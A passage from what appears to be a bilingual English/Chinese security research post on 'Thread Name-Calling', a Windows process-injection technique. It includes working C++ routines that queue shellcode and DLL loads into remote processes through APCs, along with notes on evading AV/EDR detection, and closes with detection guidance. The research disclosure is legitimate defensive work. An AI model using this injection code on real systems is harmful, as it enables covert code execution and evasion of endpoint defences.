bool run_injected_v1(HANDLE hProcess, void* remotePtr, size_t payload_len) { DWORD oldProtect = 0; if (!VirtualProtectEx(hProcess, remotePtr, payload_len, PAGE_EXECUTE_READWRITE, &oldProtect)) { std::cout << "Failed to protect!" << std::hex << GetLastError() << "\n"; return false; } HANDLE hThread = find_thread(hProcess, THREAD_SET_CONTEXT); if (!hThread || hThread == INVALID_HANDLE_VALUE) { std::cerr << "Invalid thread handle!\n"; return false; } bool isOk = false; auto _RtlDispatchAPC = GetProcAddress(GetModuleHandle("ntdll.dll"), MAKEINTRESOURCE(8)); //RtlDispatchAPC; if (_RtlDispatchAPC) { if (queue_apc_thread(hThread, _RtlDispatchAPC, shellcodePtr, 0, (void*)(-1))) { isOk = true; } } CloseHandle(hThread); return isOk; }
bool run_injected_v1(HANDLE hProcess, void* remotePtr, size_t payload_len)
{
    DWORD oldProtect = 0;
    if (!VirtualProtectEx(hProcess, remotePtr, payload_len, PAGE_EXECUTE_READWRITE, &oldProtect)) {
        std::cout << "Failed to protect!" << std::hex << GetLastError() << "\n";
        return false;
    }
    HANDLE hThread = find_thread(hProcess, THREAD_SET_CONTEXT);
    if (!hThread || hThread == INVALID_HANDLE_VALUE) {
        std::cerr << "Invalid thread handle!\n";
        return false;
    }
    bool isOk = false;
    auto _RtlDispatchAPC = GetProcAddress(GetModuleHandle("ntdll.dll"), MAKEINTRESOURCE(8)); //RtlDispatchAPC;
    if (_RtlDispatchAPC) {
        if (queue_apc_thread(hThread, _RtlDispatchAPC, shellcodePtr, 0, (void*)(-1))) {
            isOk = true;
        }
    }
    CloseHandle(hThread);
    return isOk;
}

Extended version, covering different possibilities:
扩展版本,涵盖不同可能性:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
bool run_injected(HANDLE hProcess, void* remotePtr, size_t payload_len)
{
void* shellcodePtr = remotePtr;
#ifdef USE_EXISTING_THREAD
HANDLE hThread = find_thread(hProcess, THREAD_SET_CONTEXT);
#else
HANDLE hThread = create_alertable_thread(hProcess);
#endif
if (!hThread || hThread == INVALID_HANDLE_VALUE) {
std::cerr << "Invalid thread handle!\n";
return false;
}
#ifdef USE_NEW_BUFFER
shellcodePtr = VirtualAllocEx(hProcess, nullptr, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (!shellcodePtr) {
std::cout << "Failed to allocate!" << std::hex << GetLastError() << "\n";
return false;
}
std::cout << "Allocated: " << std::hex << shellcodePtr << "\n";
void* _RtlMoveMemoryPtr = GetProcAddress(GetModuleHandle("ntdll.dll"), "RtlMoveMemory");
if (!_RtlMoveMemoryPtr) {
std::cerr << "Failed retrieving: _RtlMoveMemoryPtr\n";
return false;
}
if (!queue_apc_thread(hThread, _RtlMoveMemoryPtr, shellcodePtr, remotePtr, (void*)payload_len)) {
return false;
}
std::cout << "Added RtlMoveMemory to the thread queue!\n";
#else
DWORD oldProtect = 0;
if (!VirtualProtectEx(hProcess, shellcodePtr, payload_len, PAGE_EXECUTE_READWRITE, &oldProtect)) {
std::cout << "Failed to protect!" << std::hex << GetLastError() << "\n";
return false;
}
std::cout << "Protection changed! Old: " << std::hex << oldProtect << "\n";
#endif
bool isOk = false;
auto _RtlDispatchAPC = GetProcAddress(GetModuleHandle("ntdll.dll"), MAKEINTRESOURCE(8)); //RtlDispatchAPC;
if (_RtlDispatchAPC) {
std::cout << "Using RtlDispatchAPC\n";
if (queue_apc_thread(hThread, _RtlDispatchAPC, shellcodePtr, 0, (void*)(-1))) {
isOk = true;
}
}
else {
if (queue_apc_thread(hThread, shellcodePtr, 0, 0, 0)) {
isOk = true;
}
}
if (isOk) std::cout << "Added to the thread queue!\n";
#ifndef USE_EXISTING_THREAD
ResumeThread(hThread);
#endif
CloseHandle(hThread);
return isOk;
}
bool run_injected(HANDLE hProcess, void* remotePtr, size_t payload_len) { void* shellcodePtr = remotePtr; #ifdef USE_EXISTING_THREAD HANDLE hThread = find_thread(hProcess, THREAD_SET_CONTEXT); #else HANDLE hThread = create_alertable_thread(hProcess); #endif if (!hThread || hThread == INVALID_HANDLE_VALUE) { std::cerr << "Invalid thread handle!\n"; return false; } #ifdef USE_NEW_BUFFER shellcodePtr = VirtualAllocEx(hProcess, nullptr, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (!shellcodePtr) { std::cout << "Failed to allocate!" << std::hex << GetLastError() << "\n"; return false; } std::cout << "Allocated: " << std::hex << shellcodePtr << "\n"; void* _RtlMoveMemoryPtr = GetProcAddress(GetModuleHandle("ntdll.dll"), "RtlMoveMemory"); if (!_RtlMoveMemoryPtr) { std::cerr << "Failed retrieving: _RtlMoveMemoryPtr\n"; return false; } if (!queue_apc_thread(hThread, _RtlMoveMemoryPtr, shellcodePtr, remotePtr, (void*)payload_len)) { return false; } std::cout << "Added RtlMoveMemory to the thread queue!\n"; #else DWORD oldProtect = 0; if (!VirtualProtectEx(hProcess, shellcodePtr, payload_len, PAGE_EXECUTE_READWRITE, &oldProtect)) { std::cout << "Failed to protect!" << std::hex << GetLastError() << "\n"; return false; } std::cout << "Protection changed! Old: " << std::hex << oldProtect << "\n"; #endif bool isOk = false; auto _RtlDispatchAPC = GetProcAddress(GetModuleHandle("ntdll.dll"), MAKEINTRESOURCE(8)); //RtlDispatchAPC; if (_RtlDispatchAPC) { std::cout << "Using RtlDispatchAPC\n"; if (queue_apc_thread(hThread, _RtlDispatchAPC, shellcodePtr, 0, (void*)(-1))) { isOk = true; } } else { if (queue_apc_thread(hThread, shellcodePtr, 0, 0, 0)) { isOk = true; } } if (isOk) std::cout << "Added to the thread queue!\n"; #ifndef USE_EXISTING_THREAD ResumeThread(hThread); #endif CloseHandle(hThread); return isOk; }
bool run_injected(HANDLE hProcess, void* remotePtr, size_t payload_len)
{
    void* shellcodePtr = remotePtr;
#ifdef USE_EXISTING_THREAD
    HANDLE hThread = find_thread(hProcess, THREAD_SET_CONTEXT);
#else
    HANDLE hThread = create_alertable_thread(hProcess);
#endif
    if (!hThread || hThread == INVALID_HANDLE_VALUE) {
        std::cerr << "Invalid thread handle!\n";
        return false;
    }
#ifdef USE_NEW_BUFFER
    shellcodePtr = VirtualAllocEx(hProcess, nullptr, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!shellcodePtr) {
        std::cout << "Failed to allocate!" << std::hex << GetLastError() << "\n";
        return false;
    }
    std::cout << "Allocated: " << std::hex << shellcodePtr << "\n";
    void* _RtlMoveMemoryPtr = GetProcAddress(GetModuleHandle("ntdll.dll"), "RtlMoveMemory");
    if (!_RtlMoveMemoryPtr) {
        std::cerr << "Failed retrieving: _RtlMoveMemoryPtr\n";
        return false;
    }
    if (!queue_apc_thread(hThread, _RtlMoveMemoryPtr, shellcodePtr, remotePtr, (void*)payload_len)) {
        return false;
    }
    std::cout << "Added RtlMoveMemory to the thread queue!\n";
#else
    DWORD oldProtect = 0;
    if (!VirtualProtectEx(hProcess, shellcodePtr, payload_len, PAGE_EXECUTE_READWRITE, &oldProtect)) {
        std::cout << "Failed to protect!" << std::hex << GetLastError() << "\n";
        return false;
    }
    std::cout << "Protection changed! Old: " << std::hex << oldProtect << "\n";
#endif
    bool isOk = false;
    auto _RtlDispatchAPC = GetProcAddress(GetModuleHandle("ntdll.dll"), MAKEINTRESOURCE(8)); //RtlDispatchAPC;
    if (_RtlDispatchAPC) {
        std::cout << "Using RtlDispatchAPC\n";
        if (queue_apc_thread(hThread, _RtlDispatchAPC, shellcodePtr, 0, (void*)(-1))) {
            isOk = true;
        }
    }
    else {
        if (queue_apc_thread(hThread, shellcodePtr, 0, 0, 0)) {
            isOk = true;
        }
    }
    if (isOk) std::cout << "Added to the thread queue!\n";
#ifndef USE_EXISTING_THREAD
    ResumeThread(hThread);
#endif
    CloseHandle(hThread);
    return isOk;
}

And it works! 而且它奏效了!

See in action 查看实际操作

Video demo: https://youtu.be/1BJaxHh91p4
视频演示:https://youtu.be/1BJaxHh91p4

Figure 3 - Demo of the Thread Name-Calling: the code injected into
mspaint.exe executed a new process: calc.exe
Figure 3 – Demo of the Thread Name-Calling: the code injected into mspaint.exe executed a new process: calc.exe
图 3 – 线程名称调用演示:注入mspaint.exe执行新进程的代码:calc.exe

As we found during our tests, although we call the potentially suspicious API (VirtualProtectEx or VirtualAllocEx ), for most of the products this indicator alone was not enough to flag the payload: it is was not registered that we are using an injected buffer.
正如我们在测试中发现的那样,尽管我们调用了可能可疑的 API (VirtualProtectExVirtualAllocEx ),但对于大多数产品来说,仅此指标不足以标记有效负载:没有注册我们正在使用注入的缓冲区。

Known limitations and field for improvements
已知限制和改进领域

During our research, we assessed several different methods of making the injected buffer executable. Unfortunately, each of those methods has its flaws. The most straight-forward way is by the API that operates on the process, such as VirtualProtectEx or VirtualAllocEx – but, using those functions may draw unwanted attention. The alternative is calling functions VirtualProtect or VirtualAlloc remotely, via ROP – however, this involves a set of APIs that are even more suspicious, so we decided to stick with the simpler alternative.
在我们的研究过程中,我们评估了几种使注入的缓冲液可执行的不同方法。不幸的是,这些方法中的每一种都有其缺陷。最直接的方法是使用对进程进行操作的 API,例如 VirtualProtectExVirtualAllocEx – 但是,使用这些函数可能会引起不必要的注意。另一种方法是通过 ROP 远程调用函数 VirtualProtectVirtualAlloc – 但是,这涉及一组更可疑的 API,因此我们决定坚持使用更简单的替代方案。

The presence of the page with RWX access rights is another indicator that will be quickly picked up by memory scanners. Using just a few more calls, we can easily implement a scenario where we allocate a new memory region with Read/Write access, copy there the injected buffer, and then change it to Read/eXecute. Also, once we have our code executed within the context of a remote process, nothing stops us from pivoting further, allocating additional memory within it (as long as the process does not use DCP policy), and moving the payload, changing the access rights back to the initial ones.
具有 RWX 访问权限的页面的存在是内存扫描程序会很快发现的另一个指标。只需再调用几次,我们就可以轻松实现这样一个场景:分配一个具有读/写访问权限的新内存区域,将注入的缓冲区复制到那里,然后将其更改为 Read/eXecute。此外,一旦我们在远程进程的上下文中执行了我们的代码,就没有什么能阻止我们进一步旋转,在其中分配额外的内存(只要该进程不使用 DCP 策略),并移动有效负载,将访问权限改回初始权限。

If needed, we can also further reduce access rights with which the process has to be opened, as described at the beginning of the chapter.
如果需要,我们还可以进一步减少必须打开进程的访问权限,如本章开头所述。

Bonus: DLL injection using Thread Name
奖励:使用 Thread Name 的 DLL 注入

DLL injection is one of the well-known techniques of augmenting a running process with our code. It is not a particularly stealthy technique, because it calls LoadLibrary on the payload (DLL) which has to be first dropped on the disk. In addition, the sole fact of loading a PE via standard API generates a kernel callback which can be used for detection. Nevertheless, it is one of the simple techniques that can be useful in some cases, and it is worthwhile to have in our arsenal.
DLL 注入是使用我们的代码增强正在运行的进程的众所周知的技术之一。它不是一种特别隐蔽的技术,因为它在有效负载 (DLL) 上调用 LoadLibrary,而有效负载 (DLL) 必须首先放在磁盘上。此外,通过标准 API 加载 PE 的唯一事实会生成可用于检测的内核回调。尽管如此,它是在某些情况下有用的简单技术之一,值得在我们的武器库中拥有。

Typical implementation of DLL injection involves:
DLL 注入的典型实现包括:

  1. VirtualAllocEx – to allocate memory for a DLL path within the remote process
    VirtualAllocEx – 为远程进程中的 DLL 路径分配内存
  2. WriteProcessMemory – to write the path into the allocated memory
    WriteProcessMemory – 将路径写入分配的内存
  3. CreateRemoteThread (or equivalents) – to call LoadLibrary remotely (passing it the pointer to the written path). Some variants may involve running the LoadLibrary via APC instead of the new thread.
    CreateRemoteThread(或等效项)– 远程调用 LoadLibrary(将指针传递给写入路径)。某些变体可能涉及通过 APC 而不是新线程运行 LoadLibrary

In this section we propose an alternative implementation, that does not require write access right to the target process, and involves non-standard APIs:
在本节中,我们提出了一种替代实现,它不需要对目标进程的写入访问权限,并且涉及非标准 API:

  1. SetThreadDescription + NtQueueApcThreadEx2 with GetThreadDescription – for remote memory allocation + writing the path to the remote process
    SetThreadDescription + NtQueueApcThreadEx2GetThreadDescription – 用于远程内存分配 + 将路径写入远程进程
  2. NtQueueApcThreadEx2 – to call LoadLibrary remotely (but of course we can also use a new thread, like in the classic implementation)
    NtQueueApcThreadEx2 – 远程调用 LoadLibrary(当然,我们也可以使用新线程,就像在经典实现中一样)

The first step can be implemented exactly as in the Thread Name-Calling implementation (described under: ”Remote write with the help of thread description”). Snippet:
第一步可以完全按照 Thread Name-Calling 实现来实现(如下所述:“在线程描述的帮助下进行远程写入”)。片段:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
const wchar_t* buf = dllName.c_str();
void* remotePtr = get_peb_unused(hProcess);
wchar_t* wPtr = pass_via_thread_name(hProcess, buf, remotePtr);
const wchar_t* buf = dllName.c_str(); void* remotePtr = get_peb_unused(hProcess); wchar_t* wPtr = pass_via_thread_name(hProcess, buf, remotePtr);
    const wchar_t* buf = dllName.c_str();
    void* remotePtr = get_peb_unused(hProcess);
    wchar_t* wPtr = pass_via_thread_name(hProcess, buf, remotePtr);

In contrast to Thread Name-Calling, we don’t have to change the access rights to our injected buffer, so the second step is very simple.
与 Thread Name-Call 相比,我们不必更改注入缓冲区的访问权限,因此第二步非常简单。

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
bool inject_with_loadlibrary(HANDLE hProcess, PVOID remote_ptr)
{
HANDLE hThread = find_thread(hProcess, THREAD_SET_CONTEXT);
bool isOk = queue_apc_thread(hThread, LoadLibraryW, remote_ptr, 0, 0);
CloseHandle(hThread);
return isOk;
}
bool inject_with_loadlibrary(HANDLE hProcess, PVOID remote_ptr) { HANDLE hThread = find_thread(hProcess, THREAD_SET_CONTEXT); bool isOk = queue_apc_thread(hThread, LoadLibraryW, remote_ptr, 0, 0); CloseHandle(hThread); return isOk; }
bool inject_with_loadlibrary(HANDLE hProcess, PVOID remote_ptr)
{
    HANDLE hThread = find_thread(hProcess, THREAD_SET_CONTEXT);
    bool isOk = queue_apc_thread(hThread, LoadLibraryW, remote_ptr, 0, 0);
    CloseHandle(hThread);
    return isOk;
}

See in action 查看实际操作

Video demo: https://youtu.be/8cSNgE3gZxY
视频演示:https://youtu.be/8cSNgE3gZxY

The tested targets 测试目标

The described techniques were tested on Windows 10, and Windows 11. List of the tested versions:
所述技术已在 Windows 10 和 Windows 11 上进行了测试。测试版本列表:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
Version 10.0.19045 Build 19045 (Windows 10 Enterprise, 64 bit)
Version 10.0.22621 Build 22000 (Windows 11 Pro, 64 bit)
Version 10.0.22621 Build 22621 (Windows 11 Pro, 64 bit - Windows 11 v22H2)
Version 10.0.22631 Build 22631 (Windows 11 Pro, 64 bit - Windows 11 v23H2)
Version 10.0.19045 Build 19045 (Windows 10 Enterprise, 64 bit) Version 10.0.22621 Build 22000 (Windows 11 Pro, 64 bit) Version 10.0.22621 Build 22621 (Windows 11 Pro, 64 bit - Windows 11 v22H2) Version 10.0.22631 Build 22631 (Windows 11 Pro, 64 bit - Windows 11 v23H2)
Version 10.0.19045 Build 19045 (Windows 10 Enterprise, 64 bit)
Version 10.0.22621 Build 22000 (Windows 11 Pro, 64 bit)
Version 10.0.22621 Build 22621 (Windows 11 Pro, 64 bit - Windows 11 v22H2)
Version 10.0.22631 Build 22631 (Windows 11 Pro, 64 bit - Windows 11 v23H2)

The intended target is a 64-bit process. The following mitigation policies may be set:
预期目标是 64 位进程。可以设置以下缓解策略:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
DWORD64 MitgFlags = PROCESS_CREATION_MITIGATION_POLICY_CONTROL_FLOW_GUARD_ALWAYS_ON
| PROCESS_CREATION_MITIGATION_POLICY_PROHIBIT_DYNAMIC_CODE_ALWAYS_ON // won't work with the version calling VirtualProtect/VirtualAlloc via ROP
| PROCESS_CREATION_MITIGATION_POLICY_HEAP_TERMINATE_ALWAYS_ON
| PROCESS_CREATION_MITIGATION_POLICY_BOTTOM_UP_ASLR_ALWAYS_ON
| PROCESS_CREATION_MITIGATION_POLICY_HIGH_ENTROPY_ASLR_ALWAYS_ON
| PROCESS_CREATION_MITIGATION_POLICY_STRICT_HANDLE_CHECKS_ALWAYS_ON
| PROCESS_CREATION_MITIGATION_POLICY_EXTENSION_POINT_DISABLE_ALWAYS_ON
| PROCESS_CREATION_MITIGATION_POLICY_IMAGE_LOAD_NO_REMOTE_ALWAYS_ON
| PROCESS_CREATION_MITIGATION_POLICY2_MODULE_TAMPERING_PROTECTION_ALWAYS_ON
;
DWORD64 MitgFlags = PROCESS_CREATION_MITIGATION_POLICY_CONTROL_FLOW_GUARD_ALWAYS_ON | PROCESS_CREATION_MITIGATION_POLICY_PROHIBIT_DYNAMIC_CODE_ALWAYS_ON // won't work with the version calling VirtualProtect/VirtualAlloc via ROP | PROCESS_CREATION_MITIGATION_POLICY_HEAP_TERMINATE_ALWAYS_ON | PROCESS_CREATION_MITIGATION_POLICY_BOTTOM_UP_ASLR_ALWAYS_ON | PROCESS_CREATION_MITIGATION_POLICY_HIGH_ENTROPY_ASLR_ALWAYS_ON | PROCESS_CREATION_MITIGATION_POLICY_STRICT_HANDLE_CHECKS_ALWAYS_ON | PROCESS_CREATION_MITIGATION_POLICY_EXTENSION_POINT_DISABLE_ALWAYS_ON | PROCESS_CREATION_MITIGATION_POLICY_IMAGE_LOAD_NO_REMOTE_ALWAYS_ON | PROCESS_CREATION_MITIGATION_POLICY2_MODULE_TAMPERING_PROTECTION_ALWAYS_ON ;
  DWORD64 MitgFlags = PROCESS_CREATION_MITIGATION_POLICY_CONTROL_FLOW_GUARD_ALWAYS_ON
        | PROCESS_CREATION_MITIGATION_POLICY_PROHIBIT_DYNAMIC_CODE_ALWAYS_ON // won't work with the version calling VirtualProtect/VirtualAlloc via ROP
        | PROCESS_CREATION_MITIGATION_POLICY_HEAP_TERMINATE_ALWAYS_ON
        | PROCESS_CREATION_MITIGATION_POLICY_BOTTOM_UP_ASLR_ALWAYS_ON
        | PROCESS_CREATION_MITIGATION_POLICY_HIGH_ENTROPY_ASLR_ALWAYS_ON
        | PROCESS_CREATION_MITIGATION_POLICY_STRICT_HANDLE_CHECKS_ALWAYS_ON
        | PROCESS_CREATION_MITIGATION_POLICY_EXTENSION_POINT_DISABLE_ALWAYS_ON
        | PROCESS_CREATION_MITIGATION_POLICY_IMAGE_LOAD_NO_REMOTE_ALWAYS_ON
        | PROCESS_CREATION_MITIGATION_POLICY2_MODULE_TAMPERING_PROTECTION_ALWAYS_ON
        ;

Thread Name-Calling won’t work on processes that have the following mitigation policy set:
线程名称调用不适用于设置了以下缓解策略的进程:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
PROCESS_CREATION_MITIGATION_POLICY_WIN32K_SYSTEM_CALL_DISABLE_ALWAYS_ON
PROCESS_CREATION_MITIGATION_POLICY_WIN32K_SYSTEM_CALL_DISABLE_ALWAYS_ON
PROCESS_CREATION_MITIGATION_POLICY_WIN32K_SYSTEM_CALL_DISABLE_ALWAYS_ON

Source code 源代码

The complete source code, containing the implementation of described techniques, can be found in the following repository:
完整的源代码(包含所述技术的实现)可以在以下存储库中找到:

https://github.com/hasherezade/thread_namecalling

Conclusions 结论

As new APIs are added to Windows, new ideas for injection techniques are appearing. To implement effective detection we must always keep an eye on the changing landscape. Fortunately, Microsoft also works on implementing more visibility for anti-malware products, and currently most of the important APIs can be monitored with the help of ETW events.
随着新 API 添加到 Windows 中,注入技术的新想法不断出现。为了实施有效的检测,我们必须始终关注不断变化的环境。幸运的是,Microsoft 还致力于为反恶意软件产品实现更高的可见性,目前大多数重要的 API 都可以在 ETW 事件的帮助下进行监控。

Thread Name-Calling uses some of the relatively new APIs. However, it cannot avoid incorporating older well-known components, such as APC injections – APIs which should always be taken into consideration as a potential threat. Similarly, the manipulation of access rights within a remote process is a suspicious activity. However, even those indicators, when used out of the typical sequence of calls, may be overlooked by some of the AV and EDR products.
线程名称调用使用一些相对较新的 API。然而,它无法避免采用较旧的知名组件,例如 APC 注射 – 应始终被视为潜在威胁的 API。同样,在远程进程中操纵访问权限也是一种可疑活动。然而,即使是这些指标,当在典型的呼叫序列之外使用时,也可能会被一些 AV 和 EDR 产品所忽视。

Check Point customers remain protected from the threats described in this research.
Check Point 客户仍然受到保护,免受本研究中描述的威胁。

Check Point’s Threat Emulation provides comprehensive coverage of attack tactics, file types, and operating systems and has developed and deployed a signature to detect and protect customers against threats described in this research.
Check Point 的威胁仿真全面覆盖了攻击策略、文件类型和操作系统,并开发并部署了签名来检测和保护客户免受本研究中描述的威胁。

Check Point’s Harmony Endpoint provides comprehensive endpoint protection at the highest security level, crucial to avoid security breaches and data compromise. Behavioral Guard protections were developed and deployed to protect customers against the threats described in this research.
Check Point 的 Harmony Endpoint 以最高安全级别提供全面的端点保护,这对于避免安全漏洞和数据泄露至关重要。开发和部署了 Behavioral Guard 保护措施,以保护客户免受本研究中描述的威胁。

TE/Harmony Endpoint protections:
TE/Harmony Endpoint 保护:

Behavioral.Win.ImageModification.C
行为 .Win.ImageModification.C

Behavioral.Win.ImageModification.F
行为 Win.ImageModification.F

References 引用

https://attack.mitre.org/techniques/T1055

https://i.blackhat.com/USA-19/Thursday/us-19-Kotler-Process-Injection-Techniques-Gotta-Catch-Them-All-wp.pdf

https://twitter.com/Hexacorn/status/1317424213951733761

https://twitter.com/_Gal_Yaniv/status/1353630677493837825

https://blahcat.github.io/posts/2019/03/17/small-dumps-in-the-big-pool.html

https://www.unknowncheats.me/forum/general-programming-and-reversing/596888-communicating-thread-name.html

https://gitlab.com/ORCA000/t.d.p

https://www.lodsb.com/shellcode-injection-using-threadnameinformation

https://modexp.wordpress.com/2019/08/27/process-injection-apc/

https://repnz.github.io/posts/apc/user-apc/#ntqueueapcthreadex-meet-special-user-apc

https://www.deepinstinct.com/blog/inject-me-x64-injection-less-code-injection

POPULAR POSTS

BLOGS AND PUBLICATIONS

We value your privacy!

BFSI uses cookies on this site. We use cookies to enable faster and easier experience for you. By continuing to visit this website you agree to our use of cookies.

ACCEPT